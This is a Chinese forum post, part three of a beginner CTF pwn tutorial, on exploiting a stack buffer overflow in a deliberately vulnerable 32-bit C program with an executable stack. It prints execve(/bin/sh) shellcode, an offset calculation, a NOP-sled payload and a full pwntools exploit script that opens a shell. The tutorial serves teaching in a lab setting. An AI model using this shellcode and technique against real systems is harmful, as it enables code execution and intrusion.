roger 发表于 2021-1-5 21:10:26

从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode



1.2 本节说明  
之前我们是利用程序代码中已经存在的system函数直接返回shell,本篇会介绍当程序没有提供shell返回的时候,如何构造一个shell。
  
  同样,教程需要对c语言和汇编有一些基本理解,分析过程中遇到问题会穿插对应知识点的方式进行说明。
  
  
二、环境设置及编译说明  
2.1 环境设置  
为了降低入门难度,会关闭操作系统的地址空间随机化(ASLR),这是针对栈溢出漏洞被操作系统广泛采用的防御措施。
# 注意,下面是临时修改方案,系统重启后会被重置为2
echo 0 > /proc/sys/kernel/randomize_va_space
2.2 编译源文件  
在实验环境创建.c源代码文件,使用如下命令进行编译。
gcc-4.8 -g -m32 -O0 -fno-stack-protector -z execstack -o [可执行文件名] [源文件名]

  知识点——编译参数说明


[*]-m32:使用32位编译
[*]-O0:关闭所有优化
[*]-g:在可执行文件中加入源码信息
[*]-fno-stack-protector:关闭栈保护
[*]  -z execstack:启用栈上代码可执行


三、构造shell  
3.1 pwn_test_bof2.c程序  
我们来看这样一段程序:
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buf;
    if (argc < 2) return 1;
    strcpy(buf, argv);
    printf("Input:%s\n", buf);
    return 0;
}

  这次我们就只有一个main函数,main函数通过strcpy拷贝argv到事先定义的buf数组中,然后将buf打印出来。
  
  根据上一节所学的知识,我们知道当argv的长度超过128时,就会发生栈溢出,但是没有system函数可以给我们提供shell了,要怎么办呢?
  
  使用如下命令进行编译:
gcc-4.8 -g -m32 -O0 -fno-stack-protector -z execstack -o pwn_test_bof2_32-gcc4.8 pwn_test_bof2.c


3.2 构造特殊的栈结构  
栈结构回顾
  我们先来回顾一下上一节中关于函数调用与返回的栈结构。
  
  调用结束时,栈变化的核心任务是弹出被调用函数(callee)的状态,并将整个栈恢复到调用函数(caller)的状态。首先弹出被调用函数(callee)的局部变量,然后将栈上存储的调用函数(caller)的基地址从栈内弹出,并重新保存到ebp寄存器中,这样调用函数的基地址信息得以恢复,此时栈顶会指向返回地址。最后将返回地址从栈顶弹出,并保存到eip寄存器内,这样调用函数的eip指令信息得以恢复,指向了调用函数后的下一条语句。
  
  构造的栈结构
  注意上文最后一句“最后将返回地址从栈顶弹出...指向了调用函数后的下一条语句”,由于程序并没有关闭栈上可执行(编译时使用了-z execstack参数,也就是说可以在栈上执行代码),如果我们将函数的返回地址改到栈上,并在栈上放置我们精心准备过的获取shell的指令语句,使得函数返回时跳转到shellcode去执行。不就可以获得shell了吗?
  
  **注意:此时虽然栈被弹出了,但只是栈顶指针的位置发生了变化,之前的写入内存的buf数组其数据并没有被清理(根据cdecl调用约定退出main函数时才被清理),所以我们可以用于跳转。
  

3.3 什么是shellcode  
shellcode就是一串可以返回shell的机器指令码,在linux上典型的有:Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)
  对应代码为:
char shellcode[] =   "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
            "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
            "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
            "\x32\xc1\x51\x69\x30\x30\x74\x69"
            "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
            "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81";

  shellcode本质就是就是一串机器码,执行后提供shell。
  

3.4 攻击思路  
根据上面的分析,我们需要如下计算步骤:


[*]找出buf变量地址。我们可以从buf一开始就写入shellcode,也可以填写一段padding后再写入shellcode。记录shellcode填充的位置。
[*]找出main函数返回地址。
[*]  计算main函数返回地址与buf变量地址2者的偏移量,在填充完shellcode后,再填充差值长度的padding,使得可以覆盖返回地址,并将返回地址指向shellcode所在位置。


  思路明确,我们现在开始来逐步调试。
  * 找出buf地址
  
  我们先随意输入一个字符串作为参数,调试过程中观察在执行完strcpy函数后特殊字符出现在哪个位置,即可快速判断buf的起始位置。
  
  查看函数汇编代码后在strcpy的下一行下断点,并输入r(run)指令执行,这个时候已经完成了函数调用,另外在ret指令下第二个断点,从上一篇中我们知道,此时栈顶即为返回地址。
disassemble main
# 下断点
b *0x080491ae
b *0x080491c8

执行并观察断点1处时的栈空间:# 执行
r
# 查看50空间的栈(由于buf数组较长,我们这里查看50长度的空间)
stack 50

  
  可以看到buf的起始地址为0xffffd580,记录下来。
  
  * 找出main函数返回地址
  输入c继续执行到第二个断点,我们来验证下地址是不是上图中我们猜测的。
# 继续执行
c

  
  可以看到确实是我们猜测的地址,在栈上的位置为0xffffd60c,另外也说明了可以通过类似<__libc_start_main+241>的关键字去找返回地址。
  
  * 计算偏移量差值,覆盖返回地址
  于是我们可以计算偏移量差值为140:
gdb-peda$ p/d 0xffffd60c - 0xffffd580
$2 = 140

  * 尝试构造Payload
  于是我们可以构造如下的payload结构,这里buf的起始地址位置就是填在返回地址所在位置:
  shellcode + padding + buf的起始地址
# payload:shellcode(48字节) + padding(140-48=92字节) + buf的起始地址(注意要转换成小端序)
"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48) + "\x80\xd5\xff\xff"

  在命令行里执行,却发现报错了,是我们哪里出错了吗?
  问题分析
  其实这是因为我们一开始调试的时候用的是4位参数AAAA进行调试的,但是我们上面payload输入的是140+4位的长度,导致程序分配的buf的地址发生了变化,起始地址不在是0xffffd580。所以我们重新整理下解题思路应该如下:


[*]先找出偏移量(偏移量不会变化)
[*]输入偏移量+4长度的字符,获得此时buf的起始地址
[*]  构造payload


  输入144位长度的字符作为参数,并检查返回地址是否被正确覆盖。这里输入:
# "A"*140+"CCCC"
gdb -q -args ./pwn_test_bof2_32-gcc4.8 $(python -c 'print "A"*140+"CCCC"')

  
  重新执行上面的下断点步骤查看buf起始地址和函数返回地址,发现输入长度变化后确实起始地址也跟着变化了,同时验证了原来是main函数返回地址的位置已经被替换成了我们预计的CCCC,证明偏移量是没有发生变化的。
  
  
  得到144输入长度下buf的起始地址应该为0xffffd4f0。
  
  * 再次构造payload
# 注意这里我们使用gdb来执行
gdb -q -args ./pwn_test_bof2_32-gcc4.8 $(python -c 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48) + "\xf0\xd4\xff\xff"')
gdb-peda$ starti
gdb-peda$ r

  可以看到我们终于成功得到了shell:
  
  
  但是你会发现如果不在gdb中执行,直接外部执行——又报错了,这又是为啥呢?
  
  * 增加NOP链
  这是因为gdb在运行时,会往栈上添加许多进程使用的环境变量,导致栈的地址变低了,但是直接运行时,没有这些环境变量,所以地址会比gdb中查询获得的高。对于这个问题,我们可以NOP链来绕过。
  
  知识点1:NOP指令
  NOP指令,也称作“空指令”,在x86的CPU中机器码为0x90(144)。NOP不执行操作,但占一个程序步。——也就是说当遇到NOP指令的时候,程序不会做任何事,而是继续执行下一条指令。
  
  我们可以改造一下payload,在头部放上一段NOP指令,然后再跟上shellcode,并适当偏移之前的buf起始地址,这样当返回地址指向这段NOP指令中的任意一个地址时,因为NOP空指令的关系,会一直找下去,直到遇到shellcode,这样就大大提高了命中率。对于栈可执行程序而言,这是一种很有效的命中方式。
  
  增加链后的payload
  我们计划插入60长度的NOP,并把上面查询获得的buf地址+60。
# 使用python快速计算
>>> hex(0xffffd4f0+60)
'0xffffd52c'

  构造payload
./pwn_test_bof2_32-gcc4.8 $(python -c 'print "\x90"*60 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "A"*(140-48-60) + "\x2c\xd5\xff\xff"')

  执行得到shell:
  
  知识点2:使用pwntools.cyclic()快速定位偏移量
  这里补充一个快速定位偏移量的好工具cyclic()
  
  在本例中,这样使用:
# 进入python并加载pwntools
root@kali-linux:~# python
>>> from pwn import *
# 生成一个200长度的有序字符串
>>> cyclic(200)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
>>>


  然后将这个串作为参数输入程序:
gdb -q -args ./pwn_test_bof2_32-gcc4.8 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
gdb-peda$ starti
gdb-peda$ r

  会看到如下输出:
  
  这里的0x6261616b表示函数返回到这个地址了,我们把这个放到cyclic_find()里找一下,可以看到返回了正确的偏移量。
>>> cyclic_find(0x6261616b)
140


3.6 pwntools实现  
这里提供了pwntools攻击的实现。
# coding:utf-8
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
payload = "\x90" * 60
# shellcode
payload += "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
payload += "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
payload += "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
payload += "\x32\xc1\x51\x69\x30\x30\x74\x69"
payload += "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
payload += "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
payload += "A" * (140 - 48 - 60) + p32(0xffffd52c)
p = process(argv=['/home/pwn/test/pwn_test_bof2_32-gcc4.8', payload])
p.interactive()

  
四、总结  
我们再来回顾下我们是如何自己构造一个shell的:


[*]先找出偏移量(可以利用cyclic工具)
[*]输入偏移量+4长度的字符,获得此时buf的起始地址
[*]  构造payload:

NOP*N + shellcode + padding*(偏移量-shellcode长度-NOP长度) + (shellcode地址)

  我们现在知道了怎么构造自己的shell了,但是这一切都是建立在栈上代码可以执行这一基础上的,现在的应用大部分都不太可能打开-z execstack参数了,那么我们继续思考,当栈不可执行时,我们又要怎么获得Shell呢?
- End -
页: [1]
查看完整版本: 从0开始CTF-PWN(三)没有system怎么办?构造你的shellcode